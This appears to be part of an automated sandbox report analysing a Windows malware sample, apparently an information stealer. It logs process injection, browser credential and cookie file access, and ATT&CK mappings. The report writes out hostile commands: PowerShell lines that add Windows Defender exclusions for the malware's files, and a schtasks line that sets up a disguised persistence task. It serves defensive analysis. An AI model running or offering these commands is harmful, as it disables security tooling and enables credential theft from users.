                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtSetInformationThread: Direct from: 0x77462ECC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Memory written: C:\Users\user\Desktop\C6Abn5cBei.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Section loaded: NULL target: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Section loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe -- Section loaded: NULL target: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe -- Section loaded: NULL target: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe -- Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe -- Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe -- Thread register set: target process: 6752
                Source: C:\Windows\SysWOW64\regini.exe -- Thread APC queued: target process: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp"
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Process created: C:\Users\user\Desktop\C6Abn5cBei.exe "C:\Users\user\Desktop\C6Abn5cBei.exe"
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe -- Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmp175E.tmp"
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe -- Process created: C:\Users\user\AppData\Roaming\zdDlscHlw.exe "C:\Users\user\AppData\Roaming\zdDlscHlw.exe"
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe -- Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe -- Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: mDeEygzSIDmBTP.exe, 00000010.00000000.1800363983.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2688004931.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000000.1942279251.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp -- Binary or memory string: Shell_TrayWnd
                Source: mDeEygzSIDmBTP.exe, 00000010.00000000.1800363983.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2688004931.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000000.1942279251.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp -- Binary or memory string: Progman
                Source: mDeEygzSIDmBTP.exe, 00000010.00000000.1800363983.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2688004931.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000000.1942279251.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp -- Binary or memory string: 0Program Manager
                Source: mDeEygzSIDmBTP.exe, 00000010.00000000.1800363983.0000000001B00000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2688004931.0000000001B01000.00000002.00000001.00040000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000000.1942279251.0000000000DE0000.00000002.00000001.00040000.00000000.sdmp -- Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Queries volume information: C:\Users\user\Desktop\C6Abn5cBei.exe VolumeInformation
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -- Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe -- Queries volume information: C:\Users\user\AppData\Roaming\zdDlscHlw.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exe -- Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe -- Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match -- File source: 9.2.C6Abn5cBei.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 9.2.C6Abn5cBei.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match -- File source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match -- File source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\regini.exe -- File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\regini.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\regini.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\regini.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\regini.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe -- File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe -- Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

Source: Yara match | File source: 9.2.C6Abn5cBei.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.C6Abn5cBei.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one column per tactic; a number in parentheses is the count the report shows next to that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Process Injection (412) | Masquerading (1) | OS Credential Dumping (1) | Security Software Discovery (221) | Remote Services | Email Collection (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | Scheduled Task/Job (1) | Disable or Modify Tools (11) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Abuse Elevation Control Mechanism (1) | Virtualization/Sandbox Evasion (41) | Security Account Manager | Virtualization/Sandbox Evasion (41) | SMB/Windows Admin Shares | Data from Local System (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | DLL Side-Loading (1) | Process Injection (412) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (4) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Abuse Elevation Control Mechanism (1) | Cached Domain Credentials | System Information Discovery (113) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Obfuscated Files or Information (3) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Software Packing (2) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Timestomp (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | DLL Side-Loading (1) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior Graph ID: 1588774 | Sample: C6Abn5cBei.exe | Start date: 11/01/2025 | Architecture: WINDOWS | Score: 100
(The graph image is not reproduced; its nodes and edges are listed below.)

Start node
  DNS/IP: www.cg19g5.pro; hm35s.top; 3 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Sigma detected: Scheduled temp file as task from temp location; 6 other signatures
  Started: C6Abn5cBei.exe; zdDlscHlw.exe

C6Abn5cBei.exe
  Dropped: C:\Users\user\AppData\Roaming\zdDlscHlw.exe (PE32); C:\Users\...\zdDlscHlw.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpE61C.tmp (XML); C:\Users\user\AppData\...\C6Abn5cBei.exe.log (ASCII)
  Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  Started: C6Abn5cBei.exe (child); powershell.exe (first); powershell.exe (second); schtasks.exe

zdDlscHlw.exe
